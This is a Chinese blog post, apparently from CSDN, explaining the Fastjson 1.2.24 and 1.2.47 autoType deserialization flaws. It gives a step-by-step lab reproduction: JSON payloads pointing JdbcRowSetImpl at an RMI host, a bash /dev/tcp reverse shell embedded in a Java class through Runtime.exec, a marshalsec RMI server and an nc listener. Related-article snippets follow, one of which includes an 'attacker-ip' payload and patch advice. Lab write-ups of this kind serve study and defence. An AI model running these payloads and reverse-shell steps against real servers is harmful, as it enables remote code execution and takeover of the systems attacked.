Fastjson漏洞

于 2025-07-03 18:13:00 发布
阅读量301 收藏 10
点赞数 5
CC 4.0 BY-SA版权
文章标签: 安全 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Rozooj/article/details/149098749

Fastjson是什么

Fastjson 是阿里巴巴开源的一款高性能 Java JSON 库,用于实现 Java 对象与 JSON 数据之间的快速转换(序列化与反序列化)。

Fastjson本质就是调用get和set方法,get和set方法就是所谓的javabean,利用fastjson自动调用get set方法间接的调用(jndi注入)

Fastjson漏洞

因为基于get方法和set方法,fastjson在处理多个继承对象进行序列化后,再进行反序列化的话,会数据混乱。为解决这些问题,fastjson引用autotype属性,在进行序列化的时候,把原始类保存下来方便识别处理

每个版本有属于自己版本的漏洞,fastjson最为出名就是1.2.24 1.2.47 版本漏洞

1.2.24版本

Fastjson autoType处理json对象时,未对@type字段进行安全的校验,导致攻击者可以传入危险类,并调用危险类连接远程的RMI主机,通过其中恶意类执行代码,造成RCE

恶意代码 

#恶意代码 
{
"b":{
   #Java 标准库中的一个类,实现了jdbcRowSet接口(支持通过 JNDI 查找远程对象)
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"rmi://ip:端口/xxx",
    "autoCommit":true
    }
}

1.2.47版本

   因为在fastjson中有一个全局缓存,在类加载的时候,如果autotype没开启会先尝试从缓存中获取类,如果缓存中有,则直接返回。
    java.lang.Class类对应的deserializer为MiscCodec(核心编解码器,专门用于处理多种特殊类型的序列化和反序列化),反序列化时会取json串中的val值并加载这个val对应指定的类
   条件:fastjson cache为true,就会缓存这个val对应的class到全局缓存中

恶意代码 

{
"a":{"@type":"java.lang.Class",
     "val":"com.sun.rowset.JdbcRowSetImpl"  #加载 JdbcRowSetImpl 类
     }
"b":{
    "@type":"com.sun.rowset.JdbcRowSetlmp!", #会过滤(不影响下面代码执行)
    "dataSourceName":"rmi://ip:端口/xxx",
    "autoCommit":true
    }
}

漏洞复现

这里先打个1.2.24靶场

1. 生成一个反弹shell命令

sh -i >& /dev/tcp/{监听者ip}/7777 0>&1

2.  将刚才的命令进行base64编码

c2ggWkgPiYgldi90Y3AvMTIzLjEzNi4yMTgvNzc3NyAwYx

3.  编辑一个java文件(上一步base64编码写进去)

import java.lang.Runtime;
import java.lang.Process;

public class fastjson {
    #静态代码块(自动执行)
	static {
	    try {
	 	Runtime rt = Runtime.getRuntime();				
		String[] commands ={"/bin/bash","-c","{echo,c2ggWkgPiYgldi90Y3AvMTIzLjEzNi4yMTgvNzc3NyAwYx}|{base64,-d}{bash,-i}"};
		Process pc = rt.exec(commands);
		pc.waitFor();	
	    }catch (Exception e){

	    }
	}
}

4. 进行编译成.class文件

javac fastjson

5. 上传至监听者(kali)主机 ,开启http服务

python -m http.server 80

6.  开启RMI服务监听9999端口

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://{ip}/#fastjson" 9999

7.  开启端口监听

nc -lvvp 7777

8.  在靶场网页进行刷新抓包

1. 修改请求方法为POST
2. 将Content-Tpye中的后半段修改为json
3. 添加请求数据 
   {
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://{监听主机的ip}:9999/fastjson",
        "autoCommit":true
    }
}
4. 发送查看响应

9.  查看监听情况即可获取权限

1cee
关注
Java安全篇-Fastjson漏洞
m0_63138919的博客
03-28 4380
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
fastjson漏洞
m0_37180957的博客
05-30 552
对于最新版本的fastjson,是有漏洞的。 版本: com.alibaba fastjson 1.2.68 在序列化的过程中,是存在白名单漏洞的。具体需要关注一下反序列化的过程。 https://cert.360.cn/daily
【HW系列】—web组件漏洞FastJson和Shiro)
最新发布
2402_84408069的博客
05-26 991
本文介绍了JSON数据格式及FastJson和Shiro两个Java组件的安全风险。JSON是一种轻量级数据交换格式,包含对象、数组等结构。FastJson是一款高性能JSON解析库,但因AutoType机制存在反序列化漏洞(如CVE-2017-18349),可能导致远程代码执行,建议禁用AutoType并升级版本。Shiro是Java安全框架,其RememberMe功能的硬编码密钥可能引发反序列化攻击(如CVE-2016-4437),解决方案包括更换密钥和升级版本。
告急!fastjson又被发现漏洞,这次危害可导致服务瘫痪!
Java后端技术
09-08 390
点击上方“Java后端技术”,选择“置顶或者星标”你关注的就是我关心的!本文来源:https://tinyurl.com/y53yanrw上一篇:不敢相信?System....
fastjson漏洞环境
01-12
在给定的“fastjson漏洞环境”中,我们关注的是三个特定版本的 Fastjson 反序列化漏洞:1.2.67、1.2.66 和 1.2.62。 **一、Fastjson 反序列化漏洞** 1. **什么是反序列化漏洞?** 反序列化是将已序列化的数据恢复...
FastjsonScan.jar 用于burp插件,扫描Fastjson漏洞
07-05
burp插件
Fastjson漏洞分析与复现
未完成的歌~的博客
08-26 1819
fastjson是阿里巴巴开源的JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。
fastjson漏洞--以运维角度进行修复
菜鸟运维升级之路
09-11 1372
漏洞是三个月前由安全团队扫描出来的,主要影响是: FastJSON是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。由于具有执行效率高的特点,应用范围广泛。FastJSON 存在反序列化远程代码执行漏洞漏洞成因是Fastjson autoType开关的限制可被绕过,然后反序列化有安全风险的类。攻击者利用该漏洞可实现在目标机器上的远程代码执行。本文主要从运维侧修复手段介绍了该漏洞的两种修复方式。
fastjson 系列漏洞
SHELLCODE_8BIT的博客
11-14 2819
jackson 和 fastjson 在序列化的时候,先利用反射找到对象类的所有 get 方法,接下来去 get,然后小写化,作为 json 的每个 key 值,而 get 方法的返回值作为 value。接下来再反射 field,添加到 json 中。
fastjson1.2.75暂未修补的反序列化“漏洞“-附件资源
03-02
fastjson1.2.75暂未修补的反序列化“漏洞“-附件资源
Fastjson又被发现漏洞,这次危害可导致服务瘫痪!
热门推荐
Java笔记虾
09-07 1万+
来源:360CERT www.toutiao.com/i6733119825897325068 报告编号:B6-2019-090501 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-09-05 0x00 漏洞背景 2019年9月5日,fastjson在commit 995845170527221ca0293cf290e33a7d6cb52bf7上提交...
FastJSON安全漏洞
隐心咒Amor的博客
11-22 258
安全漏洞
Fastjson 反序列化漏洞
m0_65150886的博客
10-10 1005
Fastjson在1.2.24以及之前版本存在远程代码执行高危安全漏洞Fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链Fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
fastjson安全漏洞处理
chuanxincui的博客
07-20 542
最终将版本升级到了1.2.7.sec10 兼容版本 <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.7.sec10</version> </dependency> 引用参考 如下: 腾讯解决方案https://v2.s.tencent...
autotype安全 fastjson_Fastjson 远程代码执行漏洞
weixin_39605463的博客
01-05 187
本文章来源于观星朋友圈 补天 。下午15左右收到消息fastjson爆出全版本存在远程代码执行漏洞01fastjson介绍Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。Fastjson 源码地址:https...
fastjson版本_Fastjson被曝出“高危”远程代码执行漏洞
weixin_39612058的博客
11-30 171
5月28日,360网络安全响应中心(360-CERT)发布“Fastjson远程代码执行漏洞通告”。通告称,Java 库fastjson <= 1.2.68 版本存在远程代码执行漏洞漏洞被利用可直接获取服务器权限。360网络安全响应中心评定其为“高危漏洞”,影响面“广泛”。 据悉,该漏洞的影响版本为fastjson <=1.2.68和fastjson sec版本 <= sec...
android fastjson漏洞_Fastjson 反序列化漏洞
weixin_32309879的博客
01-12 598
作者:Longofo@知道创宇404实验室时间:2020年4月27日Fastjson没有cve编号,不太好查找时间线,一开始也不知道咋写,不过还是慢慢写出点东西,幸好fastjson开源以及有师傅们的一路辛勤记录。文中将给出与Fastjson漏洞相关的比较关键的更新以及漏洞时间线,会对一些比较经典的漏洞进行测试及修复说明,给出一些探测payload,rce payload。Fastjson解析流程...
FastJSon漏洞
03-25
<think>好的,我现在需要处理用户关于FastJSON漏洞的询问。首先,用户想了解修复方案、影响版本以及相关的安全问题。我得先回忆一下之前提供的引用内容,里面提到了Fastjson的反序列化漏洞,特别是1.2.24和1.2.47版本的例子。用户提到的参考引用[1]和[2]详细说明了漏洞的原理和复现方法,比如利用com.sun.rowset.JdbcRowSetImpl类进行RMI远程调用。 首先,我需要确定用户的问题具体是什么。他们想知道如何修复这些漏洞,哪些版本受影响,以及相关的安全风险。根据已有的知识,Fastjson漏洞主要集中在反序列化过程中,攻击者通过构造恶意的JSON数据触发远程代码执行。影响较大的版本包括1.2.24及以下,还有1.2.47等。 接下来,修复方案方面,常见的方法是升级到安全版本。例如,1.2.83或更高版本,因为这些版本修复了已知的反序列化漏洞。另外,可以配置安全模式,比如使用SafeMode防止自动反序列化。禁用autotype功能也是关键,这可以通过设置ParserConfig.getGlobalInstance().setAutoTypeSupport(false)来实现。此外,白名单机制可以限制反序列化的类,减少攻击面。输入验证同样重要,避免处理不可信的JSON数据。 影响版本方面,需要明确哪些版本存在漏洞。根据引用内容,1.2.24及以下在反序列化时存在问题,而1.2.47版本也存在RCE漏洞。所以,用户需要检查他们使用的Fastjson版本是否在这些范围内。 安全问题部分,要强调反序列化漏洞的危害,比如远程代码执行、服务器被控制、数据泄露等。同时,攻击者可能通过构造特定的JSON数据利用这些漏洞,如引用[2]中提到的JdbcRowSetImpl类。 在组织回答时,要结构清晰,分点列出修复方案、影响版本和安全问题。同时,生成的相关问题需要围绕用户可能进一步关心的点,比如如何检测漏洞、其他反序列化漏洞案例,以及加固Fastjson应用的方法。 需要确保回答准确,引用提供的资料。例如,在修复方案中提到升级到1.2.83+版本,禁用autotype,配置SafeMode,这些都是标准做法。同时,引用[1]和[2]中的内容可以作为支持,比如漏洞原理和复现方法。 最后,检查是否符合用户的要求:使用中文,LaTeX格式正确,分点回答,相关问题部分有三个问题。确认没有使用任何Markdown格式,行内公式用$包围,独立公式用$$。还要注意引用标识的位置,如[^1]和[^2]在适当的位置添加。</think>### FastJSON漏洞分析及修复方案 #### 一、影响版本 FastJSON漏洞主要集中在以下版本: - **1.2.24及以下版本**:存在反序列化漏洞,攻击者可构造恶意JSON触发远程代码执行(RCE)[^1]。 - **1.2.47及以下版本**:通过`autoType`功能绕过漏洞,利用`com.sun.rowset.JdbcRowSetImpl`类实现JNDI注入。 #### 二、修复方案 1. **升级至安全版本** 官方已修复的版本为 **1.2.83+**,建议升级至最新版本,彻底关闭高危漏洞入口。 2. **禁用`autoType`功能** 在代码中全局禁用`autoType`,防止反序列化未授权的类: ```java ParserConfig.getGlobalInstance().setAutoTypeSupport(false); ``` 3. **配置SafeMode安全模式** 启用安全模式可完全禁止反序列化任意类: ```java ParserConfig.getGlobalInstance().setSafeMode(true); ``` 4. **输入过滤与白名单** 限制反序列化的类名,仅允许可信类: ```java ParserConfig.getGlobalInstance().addAccept("com.example.safeclass"); ``` 5. **避免反序列化不可信数据** 严格校验外部输入的JSON数据,避免直接解析用户提交的内容。 #### 三、安全问题 1. **反序列化漏洞原理** 攻击者通过构造恶意JSON,利用`@type`字段指定危险类(如`com.sun.rowset.JdbcRowSetImpl`),触发JNDI注入或远程代码执行。例如: ```json {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://attacker-ip/Exploit"} ``` 2. **漏洞危害** - 远程控制服务器(RCE)。 - 敏感数据泄露或篡改。 - 服务拒绝(DoS)攻击。 #### 四、示例漏洞复现(1.2.47) 1. **攻击流程** - 搭建恶意RMI服务,托管攻击代码。 - 发送包含`JdbcRowSetImpl`类的JSON数据到目标服务。 - 目标解析JSON时触发JNDI请求,加载并执行远程恶意代码。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值